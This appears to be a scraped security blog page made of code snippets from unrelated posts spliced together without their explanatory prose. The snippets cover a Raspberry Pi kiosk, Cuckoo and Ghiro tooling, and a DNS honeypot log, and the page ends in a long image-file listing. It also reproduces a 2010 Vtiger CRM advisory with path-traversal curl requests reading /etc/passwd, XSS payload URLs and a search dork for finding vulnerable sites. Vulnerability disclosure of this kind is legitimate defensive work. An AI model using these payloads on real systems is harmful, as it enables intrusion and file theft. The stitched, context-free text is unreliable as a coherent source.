Alessandro Tanasi @jekil's blog

/etc/network/interfaces

$ docker run --name udpot -p 5053:5053/udp -p 5053:5053/tcp -d jekil/udpot

sudo raspi-config

auto eth0
iface eth0 inet static
address 192.168.1.69
netmask 255.255.255.0
network 192.168.0.0
broadcast 192.168.1.255
gateway 192.168.1.1

sudo apt-get update && sudo apt-get upgrade -y

sudo apt-get install ntpdate
sudo ntpdate -u ntp.ubuntu.com

sudo apt-get install -y lightdm unclutter lxde-core midori

xserver-command=X -s 0 dpms

# @xscreensaver -no-splash
# Turn off screensaver
@xset s off
# Turn off power saving
@xset -dpms
# Disable screen blanking
@xset s noblank
# Hide the mouse cursor
@unclutter

@midori -e Fullscreen -a file:///home/pi/index.html

<!doctype html>
<html>
<head>
</head>
    <body>
        <iframe id="foo" style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></iframe>
<script>
            (function() {
                var e = document.getElementById('foo'),
                    f = function( el, url ) {
                        el.src = url;
                    },
                    // List here the URLs you want to show in your home dashboard.
                    urls = [
                    'http://www.cnn.com/',
                    'http://www.bbc.co.uk'
                    ],
                    i = 0,
                    l = urls.length;

                    (function rotation() {
                        if ( i != l-1 ) {
                            i++
                        } else {
                            i = 0;
                        }
                        f( e, urls[i] );
                        setTimeout( arguments.callee, 90000 );
                    })();
            })();
        </script>
    </body>
</html>

0       0      *       *       1,2,3,4,5 /sbin/shutdown -h now

This OVF package requires unsupported hardware.
Details: Line 33: Unsupported hardware family 'virtualbox-2.2'.

ovftool.exe --lax source.ova destination.ovf

<vssd:VirtualSystemType>virtualbox-2.2</vssd:VirtualSystemType>

<vssd:VirtualSystemType>vmx-07</vssd:VirtualSystemType>

<Item>
<rasd:Address>0</rasd:Address>
<rasd:Caption>sataController0</rasd:Caption>
<rasd:Description>SATA Controller</rasd:Description>
<rasd:ElementName>sataController0</rasd:ElementName>
<rasd:InstanceID>5</rasd:InstanceID>
<rasd:ResourceSubType>AHCI</rasd:ResourceSubType>
<rasd:ResourceType>20</rasd:ResourceType>
</Item>

<Item>
<rasd:Address>0</rasd:Address>
<rasd:Caption>SCSIController</rasd:Caption>
<rasd:Description>SCSI Controller</rasd:Description>
<rasd:ElementName>SCSIController</rasd:ElementName>
<rasd:InstanceID>5</rasd:InstanceID>
<rasd:ResourceSubType>lsilogic</rasd:ResourceSubType>
<rasd:ResourceType>6</rasd:ResourceType>
</Item>

$ python cuckoo.py --clean

Ghiro 0.2 has been released!

Ghiro is an automated image forensics tool: sometimes forensic investigators
need to process digital images as evidence. Dealing with tons of images is
pretty easy, Ghiro is designed to scale to support gigs of images.
All tasks are totally automated, you have just to upload you images and let
Ghiro does the work. Understandable reports, and great search capabilities
allows you to find a needle in a haystack. Ghiro is a multi user environment,
different permissions can be assigned to each user. Cases allow you to group
image analysis by topic, you can choose which user allow to see your case
with a permission schema.

It can be downloaded from http://getghiro.org  in both package and appliance
ready-for-use.

What’s new in Ghiro 0.2?

* Added case deletion, you can now delete a case.
* Added analysis deletion, you can now delete an analysis.
* Added favorited images.
* Added automatic update check and option to disable it.
* Added filter to show only completed analysis in task panel.
* Added an admin panel showing dependency status.
* Added image’s hex view page.
* Added PDF and HTML static report download.
* Added image’s strings extraction and important string highlight.
* Added requirements.txt for quick dependency setup with pip.
* Added JSON API to create cases and submit images.
* Added command to check for new releases via command line.
* Added search only inside cases, now you can specify in which case search.
* Added image’s tags, now you can tag an image.
* Added image’s comments, now you can comment an image.
* Added signatures count in Google Map and image thumbnails view.
* Added URL upload, now you can upload an image from an URL.
* Refactored image analyzer to be modular, rewritten all analysis features as
modular plugins.
* Fixed upload local folder feature, now unknown files are skipped.
* Fixed a bug when logging an activity containing UTF-8 chars.
* Updated Javascript libraries.
* Many little refactorings.
* Documentation update.
* Bug fixes.

$ packer build template.json

Cuckoo Sandbox 1.2-dev
www.cuckoosandbox.org
Copyright (c) 2010-2014

2014-08-24 00:21:33,713 [root] CRITICAL: CuckooCriticalError: Unable to bind ResultServer on 192.168.56.1:2042: [Errno 99] Cannot assign requested address

# VBoxManage hostonlyif create
# ip link set vboxnet0 up
# ip addr add 192.168.56.1/24 dev vboxnet0

import os
import dson
import codecs

from lib.cuckoo.common.abstracts import Report
from lib.cuckoo.common.exceptions import CuckooReportError

class DogeonDump(Report):

    def run(self, results):
        try:
            path = os.path.join(self.reports_path, "report.doge")
            report = codecs.open(path, "w", "utf-8")
            dson.dump(results, report, indent=4)
            report.close()
        except (UnicodeError, TypeError, IOError) as e:
            raise CuckooReportError("Failed to generate Dogeon report: %s" % e

pip install dogeon

[dogeon]
enabled = yes

such
    "info" is such
        "category" is "file",
        "package" is "",
        "started" is "2014-06-08 17:52:53",
        "custom" is "",
        "machine" is such
            "shutdown_on" is "2014-06-08 17:53:58",
            "label" is "cuckoo01",
            "manager" is "VirtualBox",
            "started_on" is "2014-06-08 17:52:53",
            "id" is 1,
            "name" is "cuckooosx"
        wow,
        "ended" is "2014-06-08 17:53:58",
        "version" is "1.2-dev",
        "duration" is 65,
        "id" is 1
    wow,
    "signatures" is so many,
    "static" is such wow,
    "dropped" is so
        such
            "yara" is so many,
[snip...]

$ git clone https://github.com/jekil/UDPot.git
$ virtualenv ve_udpot

$ source ve_udpot/bin/activate
$ cd UDPot

$ pip install -r requirements.txt

$ python dns.py -h
usage: dns.py [-h] [-p DNS_PORT] [-c REQ_COUNT] [-t REQ_TIMEOUT] [-s] [-v] server

positional arguments:
  server                DNS server IP address

optional arguments:
  -h, --help            show this help message and exit
  -p DNS_PORT, --dns-port DNS_PORT
                        DNS honeypot port
  -c REQ_COUNT, --req-count REQ_COUNT
                        how many request to resolve
  -t REQ_TIMEOUT, --req-timeout REQ_TIMEOUT
                        how many request to resolve
  -s, --sql             database connection string
  -v, --verbose         print each request

$ python dns.py -v 8.8.8.8

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 53 -j REDIRECT --to-ports 5053
# iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --to-ports 5053

$ sqlite3 db.sqlite3
SQLite version 3.7.13 2012-06-11 02:05:22
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> SELECT * FROM __main___dns;


1|94.23.212.82|30789|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:43.378744
2|94.23.212.82|30789|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:43.374297
3|94.23.212.82|30789|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:43.370550
4|94.23.212.82|30789|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:43.366275
5|94.23.212.82|30789|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:43.358958
6|94.23.212.82|37820|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:32.104334
7|94.23.212.82|37820|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:32.099354
8|94.23.212.82|37820|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:32.094711
9|94.23.212.82|37820|ahuyehue.info|ALL_RECORDS|IN|2014-04-02 10:35:32.086916

Vtiger CRM 5.2.0 Multiple Vulnerabilities

Name              Multiple Vulnerabilities in Vtiger CRM
Systems Affected  Vtiger CRM 5.2.0 and possibly earlier versions
Severity          Medium
Impact (CVSSv2)   Medium 9/10, vector: (AV:N/AC:L/Au:N/C:P/I:P/A:C)
Vendor            http://www.vtigercrm.com
Advisory          http://www.ush.it/team/ush/hack-vtigercrm_520/vtigercrm_520.txt
Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                  Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
Date              20101116

I. BACKGROUND

Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.

II. DESCRIPTION

Multiple Vulnerabilities exist in Vtiger CRM software.

III. ANALYSIS

Summary:

A) Remote Code Execution (RCE) Vulnerability
B) Local File Inclusion (LFI) Vulnerability (pre-auth)
C) Cross Site Scripting (XSS) Vulnerabilities (pre-auth, reflected)
D) Cross Site Scripting (XSS) Vulnerabilities (post-auth, reflected)

A) Remote Code Execution (RCE) Vulnerability

A Remote Code Execution vulnerability exists in Vtiger CRM version 5.2.0.
In order to exploit this vulnerability an account on the CRM system is required.

The vulnerability resides in the "Compose Mail" section. The software
permits sending email with attachments and offers a draft save feature.
When this feature is used and an attachment is specified, the
"sanitizeUploadFileName($fileName, $badFileExtensions)" validation routine
is called.

This routine involves some security checks to handle uploaded files, it
does blacklist extension checking and if a bad extension is detected the
txt extension is appended to the file-name.

The blacklist array, defined inside config.inc.php, lacks the "phtml" extension,
well known to be supported by some distributions and packaging, allowing an
attacker to execute the uploaded file and causing the vulnerability.

Below is the blacklist array defined in config.template.php:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

112: $upload_badext = array('php', 'php3', 'php4', 'php5', 'pl', 'cgi', 'py',
 'asp', 'cfm', 'js', 'vbs', 'html', 'htm', 'exe', 'bin', 'bat', 'sh', dll',
 'phps');

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

For the exploitation methodology for this issue we remand to [1], a
previous advisory of ours.

B) Local File Inclusion (LFI) Vulnerability (pre-auth)

A Local File Inclusion vulnerability exists in Vtiger CRM version 5.2.0.
The vulnerability can be exploited by unauthenticated users.

The vulnerability is present due to insecure statements in the script
phprint.php that forward unfiltered user inputs directly to an include()
function call.

Below are the insecure statements in phprint.php:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

61: $lang_crm = (empty($_GET['lang_crm'])) ? $default_language : $_GET['lang_crm'];
62: $app_strings = return_application_language($lang_crm);

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Where the function return_application_language() is defined in
include/utils/utils.php as follows:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

427: function return_application_language($language)
428: {
/.../

435:    @include("include/language/$language.lang.php");

   /.../
464: }

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The same issue is also present in graph.php:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

47: if(isset($_REQUEST['current_language']))
48: {
49:        $current_language = $_REQUEST['current_language'];
50: }
51:
52: // retrieve the translated strings.
53: $app_strings = return_application_language($current_language);

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The two vulnerable flaws can be triggered, for example, using:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

curl -kis "http://127.0.0.1/vtigercrm/phprint.php?lang_crm=/../[..]/../
etc/passwd%00&module=a&action=a&activity_mode=

curl -kis "http://127.0.0.1/vtigercrm/graph.php?current_language=/../[..]/../
etc/passwd%00&module=Accounts&action=Import&parenttab=Support"

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

C) Cross Site Scripting vulnerabilities (pre-auth, reflected)

A reflected XSS vulnerability exists in Vtiger CRM version 5.2.0.
The vulnerability can be exploited against unauthenticated users only.

The vulnerability is present on the login form, and can be triggered
using these inputs:

- username:  " onmouseover="javascript:alert('XSS');
- password:  " onmouseover="javascript:alert('XSS');

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://127.0.0.1/vtigercrm/index.php?module=Users&action=Login&default_user_name
=%22%20onmouseover=%22javascript:alert('XSS');

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

D) Cross Site Scripting (XSS) Vulnerabilities (post-auth, reflected)

A reflected XSS vulnerability exists in Vtiger CRM version 5.2.0.
The vulnerability can be exploited against authenticated users only.

The vulnerability is present due to insecure statements in the script
modules/Settings/GetFieldInfo.php that reflect unfiltered user inputs
inside the page output.

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://127.0.0.1/vtigercrm/index.php?module=Settings&action=GetFieldInfo&label
=%3Cscript%3Ealert(123)%3C/scrip%3E

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

IV. DETECTION

Vtiger CRM 5.2.0 and possibly earlier versions are vulnerable.

Vtiger CRM can be identified using the following google dork:

- intitle:"vtiger CRM 5 - Commercial Open Source CRM"

V. WORKAROUND

No fix available.

VI. VENDOR RESPONSE

"We were able to reproduce the issues you reported on 5.2,
and are working on releasing a security update shortly.
We expect to release this update within the next 3 to 4 weeks,
after running some more tests."

VII. CVE INFORMATION

CVE-2010-3909 [A]
CVE-2010-3910 [B]
CVE-2010-3911 [C, D]

VIII. DISCLOSURE TIMELINE

20101009 Bugs discovered
20101012 First vendor contact
20101012 Vendor response (Sreenivas Kanumuru)
20101012 Contacted Steven M. Christey (mitre.org)
20101012 CVEs assigned by Steven M. Christey
20100102 Vtiger CRM team confirms vulnerability (Sreenivas Kanumuru)
20101015 Advisory release scheduled for 20101115
20101116 Advisory released

IX. REFERENCES

[1] Vtiger CRM 5.0.4 Multiple Vulnerabilities
http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt

X. CREDIT

Giovanni "evilaliv3" Pellerano, Alessandro "jekil" Tanasi are credited
with the discovery of this vulnerability.

Giovanni "evilaliv3" Pellerano
web site: http://www.ush.it/, http://www.evilaliv3.org/
mail: evilaliv3 AT ush DOT it

Alessandro "jekil" Tanasi
web site: http://www.tanasi.it/
mail: alessandro AT tanasi DOT it

XI. LEGAL NOTICES

Copyright (c) 2010 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

$ file f200_02b7b50f575759cff7.tar.lzma
f200_02b7b50f575759cff7.tar.lzma: data

$ unlzma -d f200_02b7b50f575759cff7.tar.lzma

$ tar xvf f200_02b7b50f575759cff7.tar
IMG_0001.png
IMG_0002.png
IMG_0003.png
IMG_0004.png
IMG_0005.png
IMG_0006.png
IMG_0007.png
IMG_0008.png
IMG_0009.png
IMG_0010.png
IMG_0011.png
IMG_0012.png
IMG_0013.png
IMG_0014.png
IMG_0015.png
IMG_0016.png
IMG_0017.png
IMG_0018.png
IMG_0019.png
IMG_0020.png
IMG_0021.png
IMG_0022.png
IMG_0023.png
IMG_0024.png
IMG_0025.png
IMG_0026.png
IMG_0027.png
IMG_0028.png
IMG_0029.png
IMG_0030.png
IMG_0031.png
IMG_0032.png
IMG_0033.png
IMG_0034.png
IMG_0035.png
IMG_0036.png
IMG_0037.png
IMG_0038.png
IMG_0039.png
IMG_0040.png
IMG_0041.png
IMG_0042.png
IMG_0043.png
IMG_0044.png
IMG_0045.png
IMG_0046.png
IMG_0047.png
IMG_0048.png
IMG_0049.png
IMG_0050.png
IMG_0051.png
IMG_0052.png
IMG_0053.png
IMG_0054.png
IMG_0055.png
IMG_0056.png
IMG_0057.png
IMG_0058.png
IMG_0059.png
IMG_0060.png
IMG_0061.png
IMG_0062.png
IMG_0063.png
IMG_0064.png
IMG_0065.png
IMG_0066.png
IMG_0067.png
IMG_0068.png
IMG_0069.png
IMG_0070.png
IMG_0071.png
IMG_0072.png
IMG_0073.png
IMG_0074.png
IMG_0075.png
IMG_0076.png
IMG_0077.png
IMG_0078.png
IMG_0079.png
IMG_0080.png
IMG_0081.png
IMG_0082.png
IMG_0083.png
IMG_0084.png
IMG_0085.png
IMG_0086.png
IMG_0087.png
IMG_0088.png
IMG_0089.png
IMG_0090.png
IMG_0091.png
IMG_0092.png
IMG_0093.png
IMG_0094.png
IMG_0095.png
IMG_0096.png
IMG_0097.png
IMG_0098.png
IMG_0099.png
IMG_0100.png
IMG_0101.png
IMG_0102.png
IMG_0103.png
IMG_0104.png
IMG_0105.png
IMG_0106.png
IMG_0107.png
IMG_0108.png
IMG_0109.png
IMG_0110.png
IMG_0111.png
IMG_0112.png
IMG_0113.png
IMG_0114.png
IMG_0115.png
IMG_0116.png
IMG_0117.png
IMG_0118.png
IMG_0119.png
IMG_0120.png
IMG_0121.png
IMG_0122.png
IMG_0123.png
IMG_0124.png
IMG_0125.png
IMG_0126.png
IMG_0127.png
IMG_0128.png
IMG_0129.png
IMG_0130.png
IMG_0131.png
IMG_0132.png
IMG_0133.png
IMG_0134.png
IMG_0135.png
IMG_0136.png
IMG_0137.png
IMG_0138.png
IMG_0139.png
IMG_0140.png
IMG_0141.png
IMG_0142.png
IMG_0143.png
IMG_0144.png
IMG_0145.png
IMG_0146.png
IMG_0147.png
IMG_0148.png
IMG_0149.png
IMG_0150.png
IMG_0151.png
IMG_0152.png
IMG_0153.png
IMG_0154.png
IMG_0155.png
IMG_0156.png
IMG_0157.png
IMG_0158.png
IMG_0159.png
IMG_0160.png
IMG_0161.png
IMG_0162.png
IMG_0163.png
IMG_0164.png
IMG_0165.png
IMG_0166.png
IMG_0167.png
IMG_0168.png
IMG_0169.png
IMG_0170.png
IMG_0171.png
IMG_0172.png
IMG_0173.png
IMG_0174.png
IMG_0175.png
IMG_0176.png
IMG_0177.png
IMG_0178.png
IMG_0179.png
IMG_0180.png
IMG_0181.png
IMG_0182.png
IMG_0183.png
IMG_0184.png
IMG_0185.png
IMG_0186.png
IMG_0187.png
IMG_0188.png
IMG_0189.png
IMG_0190.png
IMG_0191.png
IMG_0192.png
IMG_0193.png
IMG_0194.png
IMG_0195.png
IMG_0196.png
IMG_0197.png
IMG_0198.png
IMG_0199.png
IMG_0200.png
IMG_0201.png
IMG_0202.png
IMG_0203.png
IMG_0204.png
IMG_0205.png
IMG_0206.png
IMG_0207.png
IMG_0208.png
IMG_0209.png
IMG_0210.png
IMG_0211.png
IMG_0212.png
IMG_0213.png
IMG_0214.png
IMG_0215.png
IMG_0216.png
IMG_0217.png
IMG_0218.png
IMG_0219.png
IMG_0220.png
IMG_0221.png
IMG_0222.png
IMG_0223.png
IMG_0224.png
IMG_0225.png
IMG_0226.png
IMG_0227.png
IMG_0228.png
IMG_0229.png
IMG_0230.png
IMG_0231.png
IMG_0232.png
IMG_0233.png
IMG_0234.png
IMG_0235.png
IMG_0236.png
IMG_0237.png
IMG_0238.png
IMG_0239.png
IMG_0240.png
IMG_0241.png
IMG_0242.png
IMG_0243.png
IMG_0244.png
IMG_0245.png
IMG_0246.png
IMG_0247.png
IMG_0248.png
IMG_0249.png
IMG_0250.png
IMG_0251.png
IMG_0252.png
IMG_0253.png
IMG_0254.png
IMG_0255.png
IMG_0256.png
IMG_0257.png
IMG_0258.png
IMG_0259.png
IMG_0260.png
IMG_0261.png
IMG_0262.png
IMG_0263.png
IMG_0264.png
IMG_0265.png
IMG_0266.png
IMG_0267.png
IMG_0268.png
IMG_0269.png
IMG_0270.png
IMG_0271.png
IMG_0272.png
IMG_0273.png
IMG_0274.png
IMG_0275.png
IMG_0276.png
IMG_0277.png
IMG_0278.png
IMG_0279.png
IMG_0280.png
IMG_0281.png
IMG_0282.png
IMG_0283.png
IMG_0284.png
IMG_0285.png
IMG_0286.png
IMG_0287.png
IMG_0288.png
IMG_0289.png
IMG_0290.png
IMG_0291.png
IMG_0292.png
IMG_0293.png
IMG_0294.png
IMG_0295.png
IMG_0296.png
IMG_0297.png
IMG_0298.png
IMG_0299.png
IMG_0300.png
IMG_0301.png
IMG_0302.png
IMG_0303.png
IMG_0304.png
IMG_0305.png
IMG_0306.png
IMG_0307.png
IMG_0308.png
IMG_0309.png
IMG_0310.png
IMG_0311.png
IMG_0312.png
IMG_0313.png
IMG_0314.png
IMG_0315.png
IMG_0316.png
IMG_0317.png
IMG_0318.png
IMG_0319.png
IMG_0320.png
IMG_0321.png
IMG_0322.png
IMG_0323.png
IMG_0324.png
IMG_0325.png
IMG_0326.png
IMG_0327.png
IMG_0328.png
IMG_0329.png
IMG_0330.png
IMG_0331.png
IMG_0332.png
IMG_0333.png
IMG_0334.png
IMG_0335.png
IMG_0336.png
IMG_0337.png
IMG_0338.png
IMG_0339.png
IMG_0340.png
IMG_0341.png
IMG_0342.png
IMG_0343.png
IMG_0344.png
IMG_0345.png
IMG_0346.png
IMG_0347.png
IMG_0348.png
IMG_0349.png
IMG_0350.png
IMG_0351.png
IMG_0352.png
IMG_0353.png
IMG_0354.png
IMG_0355.png
IMG_0356.png
IMG_0357.png
IMG_0358.png
IMG_0359.png
IMG_0360.png
IMG_0361.png
IMG_0362.png
IMG_0363.png
IMG_0364.png
IMG_0365.png
IMG_0366.png
IMG_0367.png
IMG_0368.png
IMG_0369.png
IMG_0370.png
IMG_0371.png
IMG_0372.png
IMG_0373.png
IMG_0374.png
IMG_0375.png
IMG_0376.png
IMG_0377.png
IMG_0378.png
IMG_0379.png
IMG_0380.png
IMG_0381.png
IMG_0382.png
IMG_0383.png
IMG_0384.png
IMG_0385.png
IMG_0386.png
IMG_0387.png
IMG_0388.png
IMG_0389.png
IMG_0390.png
IMG_0391.png
IMG_0392.png
IMG_0393.png
IMG_0394.png
IMG_0395.png
IMG_0396.png
IMG_0397.png
IMG_0398.png
IMG_0399.png
IMG_0400.png
IMG_0401.png
IMG_0402.png
IMG_0403.png
IMG_0404.png
IMG_0405.png
IMG_0406.png
IMG_0407.png
IMG_0408.png
IMG_0409.png
IMG_0410.png
IMG_0411.png
IMG_0412.png
IMG_0413.png
IMG_0414.png
IMG_0415.png
IMG_0416.png
IMG_0417.png
IMG_0418.png
IMG_0419.png
IMG_0420.png
IMG_0421.png
IMG_0422.png
IMG_0423.png
IMG_0424.png
IMG_0425.png
IMG_0426.png
IMG_0427.png
IMG_0428.png
IMG_0429.png
IMG_0430.png
IMG_0431.png
IMG_0432.png
IMG_0433.png
IMG_0434.png
IMG_0435.png
IMG_0436.png
IMG_0437.png
IMG_0438.png
IMG_0439.png
IMG_0440.png
IMG_0441.png
IMG_0442.png
IMG_0443.png
IMG_0444.png
IMG_0445.png
IMG_0446.png
IMG_0447.png
IMG_0448.png
IMG_0449.png
IMG_0450.png
IMG_0451.png
IMG_0452.png
IMG_0453.png
IMG_0454.png
IMG_0455.png
IMG_0456.png
IMG_0457.png
IMG_0458.png
IMG_0459.png
IMG_0460.png
IMG_0461.png
IMG_0462.png
IMG_0463.png
IMG_0464.png
IMG_0465.png
IMG_0466.png
IMG_0467.png
IMG_0468.png
IMG_0469.png
IMG_0470.png
IMG_0471.png
IMG_0472.png
IMG_0473.png
IMG_0474.png
IMG_0475.png
IMG_0476.png
IMG_0477.png
IMG_0478.png
IMG_0479.png
IMG_0480.png
IMG_0481.png
IMG_0482.png
IMG_0483.png
IMG_0484.png
IMG_0485.png
IMG_0486.png
IMG_0487.png
IMG_0488.png
IMG_0489.png
IMG_0490.png
IMG_0491.png
IMG_0492.png
IMG_0493.png
IMG_0494.png
IMG_0495.png
IMG_0496.png
IMG_0497.png
IMG_0498.png
IMG_0499.png
IMG_0500.png
IMG_0501.png
IMG_0502.png
IMG_0503.png
IMG_0504.png
IMG_0505.png
IMG_0506.png
IMG_0507.png
IMG_0508.png
IMG_0509.png
IMG_0510.png
IMG_0511.png
IMG_0512.png
IMG_0513.png
IMG_0514.png
IMG_0515.png
IMG_0516.png
IMG_0517.png
IMG_0518.png
IMG_0519.png
IMG_0520.png
IMG_0521.png
IMG_0522.png
IMG_0523.png
IMG_0524.png
IMG_0525.png
IMG_0526.png
IMG_0527.png
IMG_0528.png
IMG_0529.png
IMG_0530.png
IMG_0531.png
IMG_0532.png
IMG_0533.png
IMG_0534.png
IMG_0535.png
IMG_0536.png
IMG_0537.png
IMG_0538.png
IMG_0539.png
IMG_0540.png
IMG_0541.png
IMG_0542.png
IMG_0543.png
IMG_0544.png
IMG_0545.png
IMG_0546.png
IMG_0547.png
IMG_0548.png
IMG_0549.png
IMG_0550.png
IMG_0551.png
IMG_0552.png
IMG_0553.png
IMG_0554.png
IMG_0555.png
IMG_0556.png
IMG_0557.png
IMG_0558.png
IMG_0559.png
IMG_0560.png
IMG_0561.png
IMG_0562.png
IMG_0563.png
IMG_0564.png
IMG_0565.png
IMG_0566.png
IMG_0567.png
IMG_0568.png
IMG_0569.png
IMG_0570.png
IMG_0571.png
IMG_0572.png
IMG_0573.png
IMG_0574.png
IMG_0575.png
IMG_0576.png
IMG_0577.png
IMG_0578.png
IMG_0579.png
IMG_0580.png
IMG_0581.png
IMG_0582.png
IMG_0583.png
IMG_0584.png
IMG_0585.png
IMG_0586.png
IMG_0587.png
IMG_0588.png
IMG_0589.png
IMG_0590.png
IMG_0591.png
IMG_0592.png
IMG_0593.png
IMG_0594.png
IMG_0595.png
IMG_0596.png
IMG_0597.png
IMG_0598.png
IMG_0599.png
IMG_0600.png
IMG_0601.png
IMG_0602.png
IMG_0603.png
IMG_0604.png
IMG_0605.png
IMG_0606.png
IMG_0607.png
IMG_0608.png
IMG_0609.png
IMG_0610.png
IMG_0611.png
IMG_0612.png
IMG_0613.png
IMG_0614.png
IMG_0615.png
IMG_0616.png
IMG_0617.png
IMG_0618.png
IMG_0619.png
IMG_0620.png
IMG_0621.png
IMG_0622.png
IMG_0623.png
IMG_0624.png
IMG_0625.png
IMG_0626.png
IMG_0627.png
IMG_0628.png
IMG_0629.png
IMG_0630.png
IMG_0631.png
IMG_0632.png
IMG_0633.png
IMG_0634.png
IMG_0635.png
IMG_0636.png
IMG_0637.png
IMG_0638.png
IMG_0639.png
IMG_0640.png
IMG_0641.png
IMG_0642.png
IMG_0643.png
IMG_0644.png
IMG_0645.png
IMG_0646.png
IMG_0647.png
IMG_0648.png
IMG_0649.png
IMG_0650.png
IMG_0651.png
IMG_0652.png
IMG_0653.png
IMG_0654.png
IMG_0655.png
IMG_0656.png
IMG_0657.png
IMG_0658.png
IMG_0659.png
IMG_0660.png
IMG_0661.png
IMG_0662.png
IMG_0663.png
IMG_0664.png
IMG_0665.png
IMG_0666.png
IMG_0667.png
IMG_0668.png
IMG_0669.png
IMG_0670.png
IMG_0671.png
IMG_0672.png
IMG_0673.png
IMG_0674.png
IMG_0675.png
IMG_0676.png
IMG_0677.png
IMG_0678.png
IMG_0679.png
IMG_0680.png
IMG_0681.png
IMG_0682.png
IMG_0683.png
IMG_0684.png
IMG_0685.png
IMG_0686.png
IMG_0687.png
IMG_0688.png
IMG_0689.png
IMG_0690.png
IMG_0691.png
IMG_0692.png
IMG_0693.png
IMG_0694.png
IMG_0695.png
IMG_0696.png
IMG_0697.png
IMG_0698.png
IMG_0699.png
IMG_0700.png
IMG_0701.png
IMG_0702.png
IMG_0703.png
IMG_0704.png
IMG_0705.png
IMG_0706.png
IMG_0707.png
IMG_0708.png
IMG_0709.png
IMG_0710.png
IMG_0711.png
IMG_0712.png
IMG_0713.png
IMG_0714.png
IMG_0715.png
IMG_0716.png
IMG_0717.png
IMG_0718.png
IMG_0719.png
IMG_0720.png
IMG_0721.png
IMG_0722.png
IMG_0723.png
IMG_0724.png
IMG_0725.png
IMG_0726.png
IMG_0727.png
IMG_0728.png
IMG_0729.png
IMG_0730.png
IMG_0731.png
IMG_0732.png
IMG_0733.png
IMG_0734.png
IMG_0735.png
IMG_0736.png
IMG_0737.png
IMG_0738.png
IMG_0739.png
IMG_0740.png
IMG_0741.png
IMG_0742.png
IMG_0743.png
IMG_0744.png
IMG_0745.png
IMG_0746.png
IMG_0747.png
IMG_0748.png
IMG_0749.png
IMG_0750.png
IMG_0751.png
IMG_0752.png
IMG_0753.png
IMG_0754.png
IMG_0755.png
IMG_0756.png
IMG_0757.png
IMG_0758.png
IMG_0759.png
IMG_0760.png
IMG_0761.png
IMG_0762.png
IMG_0763.png
IMG_0764.png
IMG_0765.png
IMG_0766.png
IMG_0767.png
IMG_0768.png
IMG_0769.png
IMG_0770.png
IMG_0771.png
IMG_0772.png
IMG_0773.png
IMG_0774.png
IMG_0775.png
IMG_0776.png
IMG_0777.png
IMG_0778.png
IMG_0779.png
IMG_0780.png
IMG_0781.png
IMG_0782.png
IMG_0783.png
IMG_0784.png
IMG_0785.png
IMG_0786.png
IMG_0787.png
IMG_0788.png
IMG_0789.png
IMG_0790.png
IMG_0791.png
IMG_0792.png
IMG_0793.png
IMG_0794.png
IMG_0795.png
IMG_0796.png
IMG_0797.png
IMG_0798.png
IMG_0799.png
IMG_0800.png
IMG_0801.png
IMG_0802.png
IMG_0803.png
IMG_0804.png
IMG_0805.png
IMG_0806.png
IMG_0807.png
IMG_0808.png
IMG_0809.png
IMG_0810.png
IMG_0811.png
IMG_0812.png
IMG_0813.png
IMG_0814.png
IMG_0815.png
IMG_0816.png
IMG_0817.png
IMG_0818.png
IMG_0819.png
IMG_0820.png
IMG_0821.png
IMG_0822.png
IMG_0823.png
IMG_0824.png
IMG_0825.png
IMG_0826.png
IMG_0827.png
IMG_0828.png
IMG_0829.png
IMG_0830.png
IMG_0831.png
IMG_0832.png
IMG_0833.png
IMG_0834.png
IMG_0835.png
IMG_0836.png
IMG_0837.png
IMG_0838.png
IMG_0839.png
IMG_0840.png
IMG_0841.png
IMG_0842.png
IMG_0843.png
IMG_0844.png
IMG_0845.png
